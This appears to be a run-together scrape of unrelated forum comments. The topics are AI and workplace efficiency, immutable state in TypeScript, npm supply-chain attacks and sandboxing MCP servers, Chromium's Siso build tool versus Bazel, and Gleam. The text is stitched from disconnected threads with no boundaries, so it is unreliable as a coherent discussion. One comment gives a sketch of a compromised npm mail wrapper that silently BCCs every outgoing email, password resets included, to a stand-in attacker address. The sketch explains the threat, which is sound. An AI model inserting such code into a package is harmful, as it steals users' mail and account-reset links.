Shortening feedback loops was what Kent Beck and the TDD advocates were emphasizing. Now that TDD has been ruined by "experts", people are rediscovering the importance of fast feedback loops from a different perspective.
But what most of them are doing is not becoming more efficient but being seen to be more efficient. The main reason they are so obsessed with AI is that they want to send the signal that they are pursuing efficiency, whether or not they actually achieve it.
Peter Drucker popularized the phrase "Efficiency is doing things right; effectiveness is doing the right things."
Being credibly efficient at doing the wrong things turns out to be a massive issue inside most companies. What's interesting is that I do think AI gives you an opportunity to be massively more effective, because with the right LLM, trained the right way, you can explore a variety of scenarios much faster than you could by yourself. However, we hear very little about this as a central thrust of how to bring AI into the workplace.
In my experience plenty of places are quite inefficient at doing the wrong things as well. You might think this reduces the number of wrong things done, but somehow it doesn't.
It's almost comical, isn't it? But it actually turns out that this is a big foundation of behavioral economics. In essence, you can get trapped in an upper-level heuristic and never stop for a moment to think things through.
Another one of my favorite examples is some research out of Harvard that basically suggested that if people spent 15 minutes a day reviewing what they had done and what was important, they increased their productivity by 22%. Now you would think this is so obvious and so dramatic that you would have a variety of Fortune 500 companies saying "oh my goodness, we want all of our workers to be 22% more productive" and simply sending out a memo or an email or some sort of process to force people to do some reflecting.
I would also suggest that Microsoft had a unique advantage based on the idea that people should have their own enclosed workspace to do coding. This was deeply entrenched when Bill was running the company day-to-day. And I'm sure, as somebody who was a coding phenomenon, it simply made sense to him. But academically, it also makes sense.
Microsoft has reversed this policy, but as far as I can tell, it doesn't have anything to do with the research. It has to do with statements about working together efficiently, or AI productivity. If there's real research behind it, then great.
My problem is there just doesn't appear to be any real research behind it. Yet I'm sure many managers at Microsoft think that it's very efficient. Of course, if you do know anybody at Microsoft who codes, they have their own opinion, and rather than me repeating hearsay, it would be fantastic to have somebody anonymously post what's really going on here. I'll betcha a nickel that 90% of them are not reporting that they feel a lot more effective.
That happens whether the state is immutable or not. In the mutable world, you have to guard it with a mutex or something. In that case, operation 1 may be blocked by operation 2, and now you get a "stale" state from operation 2. But that's okay; you'll get a new state next time. The real problem occurs when two states get mixed and corrupted.
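A minimal TypeScript sketch of the distinction (the names are made up for illustration): the mutable update has a window in which another task can observe two fields that disagree, while the immutable version builds the next state off to the side and swaps it in, so a reader only ever sees a whole snapshot, possibly a slightly stale one.

    // Two fields that must always agree with each other.
    type State = { readonly count: number; readonly label: string };

    // Mutable world: a reader that runs between the two assignments sees a
    // torn state (count already bumped, label still describing the old count).
    // This is the window you would have to guard with a mutex in a threaded language.
    const shared = { count: 0, label: "count=0" };
    async function mutableUpdate(): Promise<void> {
      shared.count += 1;
      await new Promise((resolve) => setTimeout(resolve, 0)); // yield mid-update
      shared.label = `count=${shared.count}`;
    }

    // Immutable world: build the next snapshot, then swap the reference.
    // A reader gets either the old snapshot or the new one, never a mixture.
    let current: State = { count: 0, label: "count=0" };
    function immutableUpdate(): void {
      const next = current.count + 1;
      current = { count: next, label: `count=${next}` };
    }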
It's almost always npm packages. I know that's because npm is the most widely used package system and the most attractive one for attackers. But it still leaves a bad taste in my mouth.
Even OpenAI uses npm to distribute their Codex CLI tool, which is built in Rust. That seems absurd to me, but I guess the alternatives are less convenient.
This is why I don't run stdio MCP servers. All MCPs run on docker containers on a separate VM host on an untrusted VLAN and I connect to them via SSE.
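For what it's worth, the client side of that setup is small. A sketch with the TypeScript MCP SDK as I understand it (the import paths, the URL, and the exact constructor shapes here are assumptions, so check them against the SDK version you actually use):

    import { Client } from "@modelcontextprotocol/sdk/client/index.js";
    import { SSEClientTransport } from "@modelcontextprotocol/sdk/client/sse.js";

    // Point the transport at the SSE endpoint exposed by the containerized
    // server on the untrusted VLAN, instead of spawning a local stdio process.
    const transport = new SSEClientTransport(new URL("http://10.0.66.5:8080/sse"));

    const client = new Client({ name: "sandboxed-client", version: "1.0.0" });
    await client.connect(transport);

    // The tools run on the isolated host; only their results come back here.
    const tools = await client.listTools();
    console.log(tools);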
Still vulnerable to prompt injection of course, but I don't connect LLMs to my main browser profile, email, or cloud accounts either. Nothing sensitive.
If you used this package, you would still have been a victim despite that setup: every password reset, or anything else your app sends by email, gets BCC'd to the bad guy.
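To make that concrete, here is a hypothetical TypeScript sketch of the kind of thing a compromised mail-sending dependency can do (the function names and address are invented; this is the shape of the attack, not the actual code): the exfiltration rides inside mail your own app legitimately sends, so network isolation around MCP servers never comes into play.

    // Hypothetical compromised wrapper around a mail-sending dependency.
    type MailOptions = { from: string; to: string; subject: string; text: string; bcc?: string };

    // Stand-in for the legitimate SMTP hand-off the package normally performs.
    async function realSend(opts: MailOptions): Promise<void> {
      /* ...deliver the message as usual... */
    }

    export async function sendMail(opts: MailOptions): Promise<void> {
      // The only change a malicious release needs: silently copy every outgoing
      // message, password resets included, to an attacker-controlled address.
      return realSend({ ...opts, bcc: "attacker@example.invalid" });
    }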
Here's hoping the above comment isn't upvoted to the point where it gets portrayed as something like a "key takeaway" from the article. That would be missing the point.
Even so, given Bazel's design goals and Chrome's heritage, a build-system migration to anything other than Bazel is an implicit indictment of Bazel itself.
Most likely Chromium needs to build on a system which doesn’t support Java. Like ChromeOS. That excludes Bazel, at least unless cross-compilation is supported (likely a monstrous headache for ChromeOS). It’s a good reason to rewrite Bazel in Rust.
Yeah, that's fair, but if I understood right, this is a custom-built tool designed to be compatible with Ninja.
That work building "yet another build tool" could have gone into programmatically generating Bazel BUILD files. So there was an active choice here somewhere; we just don't know all the information about why effort was diverted away from Bazel and toward building a new tool.
I trust them to make good decisions, so I would like to understand more. :)
Seems like Siso supports Starlark, so maybe it's a step in Bazel's direction after all.
There are a ton of tools and custom logic used by/with/for the GN ecosystem in Chromium that I imagine would be difficult to port.
This tool is substantially less complex than Bazel, and it isn't a reimplementation of Bazel either. Ninja's whole goal in life is to be a very fast local executor of the command DAG described by a ninja file, and Siso's only goal is to be a remote executor of that DAG.
This is overall less complex than their first stabs at remote execution, which involved standing up a proxy server locally and wrapping all ninja commands in a "run a command locally which forwards it to the proxy server which forwards it to the remote backend" script.
It reminds me of how Blaze (which became Bazel) was designed to be mostly compatible with the build files of a previous build system written in Python.
Yes, I've played with Gleam. A nice small language, but bigger than I had in mind. For me that's mainly about looking under the covers, which in Gleam's case involves other language platforms, so it's less interesting in this context.